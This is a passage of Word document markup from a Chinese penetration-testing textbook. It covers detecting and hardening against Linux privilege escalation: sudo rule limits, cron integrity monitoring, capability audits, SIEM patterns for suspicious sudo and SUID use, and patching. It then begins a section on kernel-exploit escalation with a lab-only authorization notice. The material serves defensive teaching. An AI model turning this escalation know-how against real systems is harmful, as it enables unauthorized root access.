          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/systemctl *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），禁止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NOPASSWD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用于有逃逸风险的程序，禁止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标用户通配符。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">完整性监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.d/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/spool/cron/crontabs/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实施文件完整性监控（FIM，File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Integrity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring），通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AIDE、Tripwire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> osquery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持续监控文件内容和权限的变更。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">capabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap -r /</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出应纳入配置审计基线，任何非预期的能力授予（尤其是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_sys_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_setuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_dac_override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）列为高危发现。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常提权日志检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">syslog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pkexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等命令相关的异常模式（如低权限账户突然执行了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、非工作时间的大量提权尝试、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">失败后立即成功的序列）。SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中可设置关联规则：低权限账户</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件的非典型执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">疑似提权行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">移除不必要的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对不需</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即可完成功能的程序执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod u-s &lt;file&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；对需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">但仅限特定用户使用的程序，通过组权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">精细的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则替代。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">精细化配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">visudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编辑规则，遵循“最小权限”原则；对生产环境建议集成到集中式认证（LDAP/Kerberos）和特权访问管理（PAM）方案中。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">权限强化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：确保</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引用的所有脚本和程序路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不可被低权限用户写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（脚本属主为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root:root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">且权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 750 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">700）；避免在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中使用相对路径，始终使用绝对路径并显式设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境变量。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">内核与软件补丁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：及时更新系统和第三方软件，特别是涉及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pkexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">polkit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）的安全补丁——这些程序历史上多次出现严重漏洞（CVE-2021-3156</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Baron Samedit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，具体</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NVD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">公告为准）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">定期渗透测试与配置审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Benchmarks（Center</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Internet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Security）的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基线检查清单进行自动化配置合规扫描；结合授权渗透测试，从攻击者视角检验防御有效性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">交叉回指框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全链路：获取本节枚举所需的基础低权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13–18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章：Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限模型、文件系统权限（rwx/suid/sgid/sticky）、进程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UID/EUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">切换的底层机理；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将简要触及内核漏洞提权的概念层面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过本节所授的枚举方法论与利用思路，读者应能在任意给定的授权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机上独立完成从低权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的第一类提权路径发现——即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">配置错误驱动的提权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。每一次成功的提权，本质上都是对“最小权限原则”违反的一次精准指认；每一次加固，本质上都是对该原则的一次重新尊重。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="274"/>
    <w:bookmarkStart w:id="275" w:name="内核漏洞概念提权防御习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">15.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核漏洞概念·提权防御·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在第15.1节中，我们系统学习了利用SUID、sudo、cron等配置错误的用户态提权技术。然而，Linux系统的安全边界最终由内核守护，如果内核本身存在漏洞，攻击者可能绕过所有用户态权限检查，直接夺取root权限。本节将深入探讨内核漏洞提权的原理，并构建一套纵深防御体系，以防御此类高级威胁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节依赖第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节已建立的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限模型（SUID、sudo、cron、capabilities）与提权枚举方法，并要求读者已通过第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 17 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章掌握获取低权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的路径。与本节相关的内核态隔离原理（用户态/内核态分离、系统调用、虚拟内存）已在《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13–16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章及第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章中详述，此处直接使用，不再重复讲授底层机制。读者可在完成第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 15.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的提权枚举练习之后，将本节作为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权路线的概念收束与防御视角的补充。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节讨论的内核漏洞概念与提权防御以“理解原理→设计检测→推动修复”为唯一目标，所有靶机迁移任务必须在自建隔离实验环境或官方授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox、TryHackMe、VulnHub、OffSec Proving </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Grounds）上完成，严禁在未授权系统上尝试任何内核级别的提权操作。读者所使用的靶机在每次实验前都应创建快照，便于在系统不稳定或配置错误后快速回滚。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
